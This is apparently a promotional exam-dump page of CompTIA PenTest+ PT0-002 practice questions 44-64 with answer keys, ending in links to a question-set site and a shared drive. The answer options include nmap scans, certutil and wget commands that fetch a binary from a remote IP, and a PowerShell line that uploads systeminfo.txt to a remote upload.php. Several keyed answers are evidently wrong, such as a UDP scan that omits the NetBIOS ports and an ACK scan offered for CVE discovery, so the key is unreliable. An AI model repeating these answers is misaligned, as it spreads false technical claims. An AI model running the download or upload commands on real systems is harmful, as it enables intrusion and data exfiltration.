Top-class CompTIA PT0-002 exam study guide practice questions, latest edition, indispensable for exam preparation [Q44-Q64]


Start using the PT0-002 questions now and pass with the PT0-002 question set PDF

Question 44
Which of the following types of information should be included when writing the remediation section of a penetration test report to be viewed by the systems administrator and technical staff?

  • A. The rules of engagement from the assessment
  • B. The executive summary and information regarding the testing company
  • C. A quick description of the vulnerability and a high-level control to fix it
  • D. Information regarding the business impact if compromised

Correct answer: D

Question 45
Which of the following BEST describe the OWASP Top 10? (Choose two.)

  • A. A list of all the risks of web applications
  • B. The most critical risks of web applications
  • C. A checklist of Apache vulnerabilities
  • D. The risks defined in order of importance
  • E. A web-application security standard
  • F. A risk-governance and compliance framework

Correct answer: B,D

Question 46
A penetration tester is attempting to discover live hosts on a subnet quickly.
Which of the following commands will perform a ping scan?

  • A. nmap -sT -p- 10.12.1.0/24
  • B. nmap -sV -A 10.12.1.0/24
  • C. nmap -Pn 10.12.1.0/24
  • D. nmap -sn 10.12.1.0/24

Correct answer: D

Question 47
A penetration tester has been given an assignment to attack a series of targets in the 192.168.1.0/24 range, triggering as few alarms and countermeasures as possible.
Which of the following Nmap scan syntaxes would BEST accomplish this objective?

  • A. nmap -sV 192.168.1.2/24 -PO
  • B. nmap -sT -vvv -O 192.168.1.2/24 -PO
  • C. nmap -sS -O 192.168.1.2/24 -T1
  • D. nmap -sA -v -O 192.168.1.2/24

Correct answer: C

Question 48
A client wants a security assessment company to perform a penetration test against its hot site. The purpose of the test is to determine the effectiveness of the defenses that protect against disruptions to business continuity. Which of the following is the MOST important action to take before starting this type of assessment?

  • A. Establish communication and escalation procedures with the client.
  • B. Verify the client has granted network access to the hot site.
  • C. Ensure the client has signed the SOW.
  • D. Determine if the failover environment relies on resources not owned by the client.

Correct answer: D

Question 49
A penetration tester is preparing to perform activities for a client that requires minimal disruption to company operations. Which of the following are considered passive reconnaissance tools? (Choose two.)

  • A. Retina
  • B. Shodan
  • C. Nikto
  • D. Burp Suite
  • E. Nessus
  • F. Wireshark

Correct answer: B,F

Question 50
Penetration-testing activities have concluded, and the initial findings have been reviewed with the client. Which of the following best describes the NEXT step in the engagement?

  • A. Attestation of findings and delivery of the report
  • B. Scheduling of follow-up actions and retesting
  • C. Acceptance by the client and sign-off on the final report
  • D. Review of the lessons learned during the engagement

Correct answer: C

Question 51
Which of the following should a penetration tester do NEXT after identifying that an application being tested has already been compromised with malware?

  • A. Collect the proper evidence and then remove the malware.
  • B. Analyze the malware to see what it does.
  • C. Remove the malware immediately.
  • D. Stop the assessment and inform the emergency contact.
  • E. Do a root-cause analysis to find out how the malware got in.

Correct answer: C

Question 52
Which of the following are the MOST important items to include in the final report for a penetration test? (Choose two.)

  • A. The vulnerability identifier
  • B. The name of the person who found the flaw
  • C. The tool used to find the issue
  • D. The network location of the vulnerable device
  • E. The CVSS score of the finding
  • F. The client acceptance form

Correct answer: A,C

Question 53
A red-team tester has been contracted to emulate the threat posed by a malicious insider on a company's network, with the constrained objective of gaining access to sensitive personnel files. During the assessment, the red-team tester identifies an artifact indicating possible prior compromise within the target environment.
Which of the following actions should the tester take?

  • A. Perform forensic analysis to isolate the means of compromise and determine attribution.
  • B. Create a detailed document of findings before continuing with the assessment.
  • C. Incorporate the newly identified method of compromise into the red team's approach.
  • D. Halt the assessment and follow the reporting procedures as outlined in the contract.

Correct answer: B

Question 54
A penetration tester is working on a scoping document with a new client. The methodology the client uses includes the following:
Pre-engagement interaction (scoping and ROE)
Intelligence gathering (reconnaissance)
Threat modeling
Vulnerability analysis
Exploitation and post exploitation
Reporting
Which of the following methodologies does the client use?

  • A. OWASP Web Security Testing Guide
  • B. PTES technical guidelines
  • C. NIST SP 800-115
  • D. OSSTMM

Correct answer: B

Question 55
A penetration tester who is conducting a web-application test discovers a clickjacking vulnerability associated with a login page to financial data. Which of the following should the tester do with this information to make this a successful exploit?

  • A. Use BeEF.
  • B. Perform XSS.
  • C. Conduct a watering-hole attack.
  • D. Use browser autopwn.

Correct answer: B

Question 56
A red team gained access to the internal network of a client during an engagement and used the Responder tool to capture important data. Which of the following was captured by the testing team?

  • A. User hashes sent over SMB
  • B. Multiple handshakes
  • C. Encrypted file transfers
  • D. IP addresses

Correct answer: A

Question 57
A security company has been contracted to perform a scoped insider-threat assessment to try to gain access to the human resources server that houses PII and salary data. The penetration testers have been given an internal network starting position.
Which of the following actions, if performed, would be ethical within the scope of the assessment?

  • A. Gaining access to hosts by injecting malware into the enterprise-wide update server
  • B. Intercepting outbound TLS traffic
  • C. Establishing and maintaining persistence on the domain controller
  • D. Leveraging a vulnerability on the internal CA to issue fraudulent client certificates
  • E. Exploiting a configuration weakness in the SQL database

Correct answer: B

Question 58
A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester START this process?

  • A. certutil -urlcache -split -f http://192.168.2.124/windows-binaries/ accesschk64.exe
  • B. schtasks /query /fo LIST /v | find /I "Next Run Time:"
  • C. wget http://192.168.2.124/windows-binaries/accesschk64.exe -O accesschk64.exe
  • D. powershell (New-Object System.Net.WebClient).UploadFile('http://192.168.2.124/ upload.php', 'systeminfo.txt')

Correct answer: D

Question 59
A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running. Which of the following would BEST support this task?

  • A. Run nmap with the --script vulners option set against the target
  • B. Run nmap with the -sV and -p22 options set against the target
  • C. Run nmap with the -sA option set against the target
  • D. Run nmap with the -o, -p22, and -sC options set against the target

Correct answer: C

Question 60
A penetration tester discovers that a web server within the scope of the engagement has already been compromised with a backdoor. Which of the following should the penetration tester do NEXT?

  • A. Continue the engagement and include the backdoor finding in the final report
  • B. Inform the customer immediately about the backdoor
  • C. Forensically acquire the backdoor Trojan and perform attribution
  • D. Utilize the backdoor in support of the engagement

Correct answer: B

Question 61
A client has requested that the penetration test scan include the following UDP services: SNMP, NetBIOS, and DNS. Which of the following Nmap commands will perform the scan?

  • A. nmap -vv sUV -p 53, 122-123, 160-161 10.10.1.20/24 -oA udpscan
  • B. nmap -vv sUV -p 53, 123-159 10.10.1.20/24 -oA udpscan
  • C. nmap -vv sUV -p 53,137-139,161-162 10.10.1.20/24 -oA udpscan
  • D. nmap -vv sUV -p 53,123,161-162 10.10.1.20/24 -oA udpscan

Correct answer: D

Question 62
A penetration tester is exploring a client's website. The tester performs a curl command and obtains the following:
* Connected to 10.2.11.144 (::1) port 80 (#0)
> GET /readmine.html HTTP/1.1
> Host: 10.2.11.144
> User-Agent: curl/7.67.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200
< Date: Tue, 02 Feb 2021 21:46:47 GMT
< Server: Apache/2.4.41 (Debian)
< Content-Length: 317
< Content-Type: text/html; charset=iso-8859-1
<
<!DOCTYPE html>
<html lang="en">
<head>
<meta name="viewport" content="width=device-width" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>WordPress &#8250; ReadMe</title>
<link rel="stylesheet" href="wp-admin/css/install.css?ver=20100228" type="text/css" />
</head>
Which of the following tools would be BEST for the penetration tester to use to explore this site further?

  • A. DirBuster
  • B. Burp Suite
  • C. OWASP ZAP
  • D. WPScan

Correct answer: B

Question 63
A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester START this process?

  • A. schtasks /query /fo LIST /v | find /I "Next Run Time:"
  • B. powershell (New-Object System.Net.WebClient).UploadFile('http://192.168.2.124/ upload.php', 'systeminfo.txt')
  • C. certutil -urlcache -split -f http://192.168.2.124/windows-binaries/ accesschk64.exe
  • D. wget http://192.168.2.124/windows-binaries/accesschk64.exe -O accesschk64.exe

Correct answer: B

Question 64
......

Free CompTIA PenTest+ PT0-002 exam questions: https://www.goshiken.com/CompTIA/PT0-002-mondaishu.html

Question set, practice exam questions and study guide usable for the PT0-002 exam: https://drive.google.com/open?id=1DPaJ7JtaMgcHIQq0772pDt7PLCtzojWy